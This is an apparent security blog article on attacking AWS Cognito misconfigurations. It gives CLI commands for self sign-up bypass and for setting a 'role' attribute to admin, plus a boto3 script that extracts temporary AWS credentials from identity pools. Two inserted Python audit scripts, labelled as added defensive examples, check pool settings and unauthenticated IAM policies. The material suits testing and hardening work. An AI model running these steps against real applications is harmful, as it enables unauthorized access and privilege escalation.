Attacking AWS | Common Cognito Misconfigurations
Introduction
AWS Cognito is a fully managed service provided by Amazon Web Services (AWS) that simplifies the process of user authentication and authorization for web and mobile applications. It offers a comprehensive set of features to handle user registration, sign-in, and user management, eliminating the need for developers to build these functionalities from scratch.
While the attacks and misconfigurations discussed in this article are well documented and have been covered by various resources, they are worth reiterating to emphasize the importance of secure configuration and ongoing monitoring in AWS Cognito deployments.

Contents
- AWS Cognito components
- Common UserPools attacks
- Detect Cognito UserPools usage
- Attack examples
- Common IdentityPools attacks
- Detect Cognito IdentityPools usage
- Attack examples
AWS Cognito components
AWS Cognito provides two main components: user pools and identity pools.
- User pools: User pools allow developers to create and manage a customizable user directory to handle user registration, sign-in, and account recovery. User pools support various authentication methods, including username and password, social login (e.g., through Google or Facebook), and multi-factor authentication (MFA). User pools also handle user profile management, allowing you to store custom attributes specific to your application’s needs.
- Identity pools: Identity pools, also known as federated identities, enable users to obtain temporary AWS credentials to access AWS services. With identity pools, you can integrate third-party identity providers (such as Google, Facebook, or your own identity system) to authenticate users and grant them access to AWS resources.


💡 Quick tip: if you see aws-sdk.min.js or amazon-cognito.min.js loaded by an application, then you should definitely search for Cognito parameters or hardcoded AWS credentials.
Common UserPools attacks
One of the key aspects of AWS Cognito user pools is the generation and utilization of JSON Web Tokens (JWTs) for authentication and authorization.
Detect Cognito UserPools usage:
To identify the usage of Cognito UserPools, look for the UserPoolId or ClientId in the JS/HTML sources of the application.

Additionally, observe login/signup calls to AWS Cognito made by the web application.

Attack examples
So, let's dive into the common attack vectors.
Let’s consider a scenario where a web service uses Cognito, but no signup option is available.

Here is what we can try:
1. Sign-up Bypass: An attacker can attempt to bypass the regular application registration process by using the AWS CLI. By executing the “aws cognito-idp sign-up” command with appropriate parameters (e.g., a fake email address and a chosen password), the attacker can initiate the registration process without following the intended steps.
aws cognito-idp sign-up --client-id '[ClientId]' --username 'mail@hacker.com' --password 's3cr4tP@ss' --user-attributes '[{"Name":"email","Value":"mail@email.com"}]'

2. Confirmation of Sign-up: After initiating the sign-up process, the attacker needs to confirm the user account. This can be achieved using the “aws cognito-idp confirm-sign-up” command, which requires the client ID and the username/email used during the sign-up process, along with a confirmation code.
aws cognito-idp confirm-sign-up --client-id '[ClientId]' --username 'mail@hacker.com' --confirmation-code '013370'


3. Login and JWT Token Acquisition: With the created user account, the attacker can initiate the login process to obtain a JWT token. By using the “aws cognito-idp initiate-auth” command with the appropriate region, client ID, and authentication parameters (username and password), the attacker can obtain the JWT token from the response.
aws cognito-idp initiate-auth --region YOUR_REGION --client-id YOUR_CLIENT_ID --auth-flow USER_PASSWORD_AUTH --auth-parameters USERNAME=YOUR_USERNAME,PASSWORD=YOUR_PASSWORD
Otherwise, you can just enter the freshly registered credentials directly into the login form.



4. Manipulating User Attributes: Once the attacker possesses a valid JWT token, they can interact with the user pool by manipulating user attributes. Using the “aws cognito-idp update-user-attributes” command, the attacker can modify attributes such as email or app role directly, potentially granting themselves elevated privileges or changing account information.
Look for some interesting parameters such as “email_verified”, “admin”, “debug_mode”, “is_premium” etc. If there are no appropriate Lambda triggers, or the attribute write permissions are misconfigured, you will be able to change the attribute from the CLI.
Expanding the attack vectors, the attacker can attempt to specify an email address of an existing user with different capitalization (e.g., user@test.com and UsEr@test.com). If the application normalizes the email address on the back-end before logging in, this could lead to unauthorized access.
To get the list of attributes set for a user, run the following command:
aws cognito-idp get-user --access-token [AccessToken]
Then try changing the attributes directly:
aws cognito-idp update-user-attributes --access-token 'TOKEN' --user-attributes '[{"Name":"email","Value":"any@mail.com"}, {"Name":"role","Value":"admin"}]' --region=us-east-2
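As a defender-side complement to steps 1 to 4 above, here is an added Python example (not part of the original article) that audits a user pool and its app client for the settings those steps depend on: self sign-up enabled without a PreSignUp trigger, an app client allowed to write privilege-carrying attributes such as custom:role or email_verified, client-writable custom attributes reaching tokens with no PreTokenGeneration trigger, and case-sensitive usernames (the email-capitalization trick). The function and constant names (audit_user_pool, fetch_pool_config, PRIVILEGE_ATTRIBUTE_RE) and the list of "privilege" attribute names are assumptions of this example; the boto3 calls describe_user_pool and describe_user_pool_client are the real API, and the sample pool and client dictionaries are constructed so the checks run offline.

```python
"""Audit an AWS Cognito user pool and app client for the misconfigurations
that the sign-up / attribute-manipulation steps above rely on.

Added example, not from the original article. The dictionaries mirror the
shape of DescribeUserPool / DescribeUserPoolClient responses; the sample
data at the bottom is constructed, so the checks run without AWS access.
"""
import re

# Attributes that usually carry authorization decisions and should never be
# in an app client's WriteAttributes. Assumption of this example; extend it
# for your own schema (names match with or without the custom: prefix).
PRIVILEGE_ATTRIBUTE_RE = re.compile(
    r"^(custom:)?(admin|is_admin|role|roles|debug_mode|is_premium|tier|plan"
    r"|email_verified|phone_number_verified)$",
    re.IGNORECASE,
)


def audit_user_pool(pool: dict, app_client: dict) -> list:
    """Return human-readable findings for one pool / app-client pair."""
    findings = []
    triggers = pool.get("LambdaConfig", {})
    writable = set(app_client.get("WriteAttributes", []))

    # 1. Self sign-up: unless admins are the only ones allowed to create
    #    users, anyone holding the ClientId can call cognito-idp sign-up.
    if not pool.get("AdminCreateUserConfig", {}).get("AllowAdminCreateUserOnly"):
        findings.append("self sign-up enabled (AllowAdminCreateUserOnly=false)")
        if "PreSignUp" not in triggers:
            findings.append("no PreSignUp trigger validates self-registrations")

    # 2. Attribute write permissions: the app client decides which attributes
    #    update-user-attributes may change with the user's own access token.
    for attr in sorted(writable):
        if PRIVILEGE_ATTRIBUTE_RE.match(attr):
            findings.append(f"app client {app_client.get('ClientId')} may write "
                            f"privilege attribute '{attr}'")

    # 3. Mutable custom attributes that the client can write end up in the
    #    ID token; a PreTokenGeneration trigger is the place to override them.
    mutable_custom = {
        s["Name"] for s in pool.get("SchemaAttributes", [])
        if s.get("Name", "").startswith("custom:") and s.get("Mutable")
    }
    if mutable_custom & writable and "PreTokenGeneration" not in triggers:
        findings.append("client-writable custom attributes reach tokens with "
                        "no PreTokenGeneration trigger")

    # 4. Case-sensitive usernames make user@x and UsEr@x distinct accounts,
    #    which is what the email-capitalization trick above depends on.
    if pool.get("UsernameConfiguration", {}).get("CaseSensitive", True):
        findings.append("usernames are case-sensitive "
                        "(UsernameConfiguration.CaseSensitive=true)")
    return findings


def fetch_pool_config(user_pool_id: str, client_id: str, region: str):
    """Load the real configuration with boto3 (needs AWS credentials)."""
    import boto3  # lazy import so the audit logic runs without boto3
    idp = boto3.client("cognito-idp", region_name=region)
    pool = idp.describe_user_pool(UserPoolId=user_pool_id)["UserPool"]
    app_client = idp.describe_user_pool_client(
        UserPoolId=user_pool_id, ClientId=client_id)["UserPoolClient"]
    return pool, app_client


# --- constructed sample data (not from a real account) -----------------------
SCHEMA = [{"Name": "email", "Mutable": True}, {"Name": "custom:role", "Mutable": True}]
WEAK_POOL = {
    "Id": "us-east-1_EXAMPLE",
    "AdminCreateUserConfig": {"AllowAdminCreateUserOnly": False},
    "LambdaConfig": {},
    "UsernameConfiguration": {"CaseSensitive": True},
    "SchemaAttributes": SCHEMA,
}
WEAK_CLIENT = {"ClientId": "EXAMPLECLIENTID", "WriteAttributes": ["email", "custom:role"]}
HARDENED_POOL = {
    "Id": "us-east-1_EXAMPLE",
    "AdminCreateUserConfig": {"AllowAdminCreateUserOnly": True},
    "LambdaConfig": {"PreSignUp": "arn:aws:lambda:REGION:ACCOUNT:function:pre-signup",
                     "PreTokenGeneration": "arn:aws:lambda:REGION:ACCOUNT:function:pre-token"},
    "UsernameConfiguration": {"CaseSensitive": False},
    "SchemaAttributes": SCHEMA,
}
HARDENED_CLIENT = {"ClientId": "EXAMPLECLIENTID", "WriteAttributes": ["email"]}

if __name__ == "__main__":
    for label, pool, cl in (("weak", WEAK_POOL, WEAK_CLIENT),
                            ("hardened", HARDENED_POOL, HARDENED_CLIENT)):
        print(f"{label}: {audit_user_pool(pool, cl)}")
```

Run against a real pool, replace the sample dictionaries with the tuple returned by fetch_pool_config. The WriteAttributes check is the one that decides whether step 4 works at all: if the app client cannot write custom:role, update-user-attributes with that attribute is rejected regardless of the token presented.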
Common IdentityPools attacks
Detect Cognito IdentityPools usage:
Look for an IdentityPoolId in the JS/HTML sources. Additionally, you may find references to retrieving temporary AWS credentials using JWT tokens.

You can retrieve temporary AWS credentials from the identity pool. These credentials can then be used to access AWS resources.
This can be done via the CLI:
aws cognito-identity get-id --identity-pool-id <identity-pool-id>
aws cognito-identity get-credentials-for-identity --identity-id <identity-id-from-previous-command>
Or using a Python script:
import boto3

# Region and identity pool ID taken from the application's JS/HTML sources
region = 'us-east-1'
identity_pool = 'us-east-1:XXXXXXXXXXXXXXXXXXXXXXXXXX'

client = boto3.client('cognito-identity', region_name=region)

# Step 1: obtain an identity ID from the pool (no login needed when the
# pool allows unauthenticated identities)
identity_id = client.get_id(IdentityPoolId=identity_pool)['IdentityId']

# Step 2: exchange the identity ID for temporary AWS credentials
response = client.get_credentials_for_identity(IdentityId=identity_id)
creds = response['Credentials']

print("Access Key: " + creds['AccessKeyId'])
print("Secret Key: " + creds['SecretKey'])
print("Session Token: " + creds['SessionToken'])
print("Identity Id: " + response['IdentityId'])
Or you can just intercept application requests to Cognito:

Attack examples
Then you can run automated tools (check the TOP free tools) or manually explore the AWS account via the CLI. But privilege escalation is a topic for another article.
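The get-id / get-credentials-for-identity flow above only pays off for an attacker when the identity pool hands out credentials without authentication and the unauthenticated role is over-permissioned. As an added defender-side example (not part of the original article), the Python below audits the DescribeIdentityPool response together with the IAM permission policy of the role mapped to unauthenticated identities: it flags AllowUnauthenticatedIdentities, the classic (basic) flow, providers without ServerSideTokenCheck, and policy statements that grant wildcard or sensitive actions to guests. The function names (audit_identity_pool, audit_unauth_policy), the SENSITIVE_ACTIONS list and the BASELINE_ACTIONS set are assumptions of this example, and all sample data is constructed.

```python
"""Audit an AWS Cognito identity pool for the weaknesses that make the
get-id / get-credentials-for-identity steps above dangerous.

Added example, not from the original article. Inputs mirror the shape of the
DescribeIdentityPool response and of an IAM policy document attached to the
pool's unauthenticated role. All sample data below is constructed.
"""
import fnmatch

# Actions a guest (unauthenticated) identity should never be able to reach.
# Assumption of this example; extend it for your own account. Lower-case
# because IAM action names are matched case-insensitively.
SENSITIVE_ACTIONS = [
    "iam:createuser", "iam:attachrolepolicy", "sts:assumerole",
    "s3:listallmybuckets", "s3:getobject", "lambda:invokefunction",
    "dynamodb:scan", "secretsmanager:getsecretvalue", "ssm:getparameter",
]
# What the console's default unauthenticated role grants; anything beyond
# this on Resource "*" deserves a look.
BASELINE_ACTIONS = {"mobileanalytics:putevents", "cognito-sync:*"}


def _as_list(value):
    """IAM accepts a string or a list for Action/Resource; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def audit_unauth_policy(policy: dict) -> list:
    """Findings for the permission policy of the unauthenticated role."""
    findings = []
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        if stmt.get("Effect") != "Allow":
            continue
        actions = [a.lower() for a in _as_list(stmt.get("Action"))]
        resources = _as_list(stmt.get("Resource"))
        if "*" in actions:
            findings.append(f"statement {idx}: Action '*' grants every API to guests")
            continue
        for pattern in actions:
            if pattern.endswith(":*") and pattern not in BASELINE_ACTIONS:
                findings.append(f"statement {idx}: service-wide wildcard '{pattern}'")
            # fnmatch applies the policy's wildcard pattern to each sensitive action
            hits = [a for a in SENSITIVE_ACTIONS if fnmatch.fnmatchcase(a, pattern)]
            if hits:
                findings.append(f"statement {idx}: '{pattern}' reaches sensitive action(s) {hits}")
        if "*" in resources and not set(actions) <= BASELINE_ACTIONS:
            findings.append(f"statement {idx}: non-baseline actions on Resource '*'")
    return findings


def audit_identity_pool(pool: dict, unauth_policy: dict = None) -> list:
    """Findings for the pool itself; `unauth_policy` is the IAM policy
    document of the role mapped to unauthenticated identities (if any)."""
    findings = []
    if pool.get("AllowUnauthenticatedIdentities"):
        findings.append("unauthenticated identities enabled: anyone holding the "
                        "IdentityPoolId can obtain AWS credentials with get-id / "
                        "get-credentials-for-identity")
        if unauth_policy:
            findings.extend(audit_unauth_policy(unauth_policy))
    if pool.get("AllowClassicFlow"):
        findings.append("classic (basic) flow enabled: clients may call "
                        "AssumeRoleWithWebIdentity for any role trusting the pool")
    for provider in pool.get("CognitoIdentityProviders", []):
        if not provider.get("ServerSideTokenCheck"):
            findings.append(f"provider {provider.get('ProviderName')}: "
                            "ServerSideTokenCheck disabled, globally signed-out or "
                            "deleted user-pool users can still obtain credentials")
    return findings


# --- constructed sample data (not from a real account) -----------------------
PROVIDER = "cognito-idp.us-east-1.amazonaws.com/us-east-1_EXAMPLE"
WEAK_POOL = {
    "IdentityPoolId": "us-east-1:00000000-0000-0000-0000-000000000000",
    "AllowUnauthenticatedIdentities": True,
    "AllowClassicFlow": True,
    "CognitoIdentityProviders": [
        {"ProviderName": PROVIDER, "ClientId": "EXAMPLECLIENTID", "ServerSideTokenCheck": False},
    ],
}
WEAK_UNAUTH_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["mobileanalytics:PutEvents", "cognito-sync:*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        {"Effect": "Allow", "Action": ["dynamodb:Scan", "dynamodb:GetItem"],
         "Resource": "arn:aws:dynamodb:us-east-1:123456789012:table/Orders"},
    ],
}
HARDENED_POOL = {
    "IdentityPoolId": "us-east-1:00000000-0000-0000-0000-000000000000",
    "AllowUnauthenticatedIdentities": False,
    "AllowClassicFlow": False,
    "CognitoIdentityProviders": [
        {"ProviderName": PROVIDER, "ClientId": "EXAMPLECLIENTID", "ServerSideTokenCheck": True},
    ],
}

if __name__ == "__main__":
    for label, pool, policy in (("weak", WEAK_POOL, WEAK_UNAUTH_POLICY),
                                ("hardened", HARDENED_POOL, None)):
        for f in audit_identity_pool(pool, policy):
            print(f"{label}: {f}")
```

With boto3 the two inputs come from describe_identity_pool (the pool dictionary) and, for the role ARN returned by get_identity_pool_roles under "unauthenticated", the policy documents attached to that role; the audit logic itself has no AWS dependency. Note that the hardened sample yields no findings purely because unauthenticated access is off, which is the single setting that removes the anonymous credential path from the article's identity pool section.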
👏🆂🆃🅰🆈 🆃🆄🅽🅴🅳 🅰🅽🅳 🆂🆄🅱🆂🅲🆁🅸🅱🅴!👏

🌐 My social networks: https://linktr.ee/s_novoselov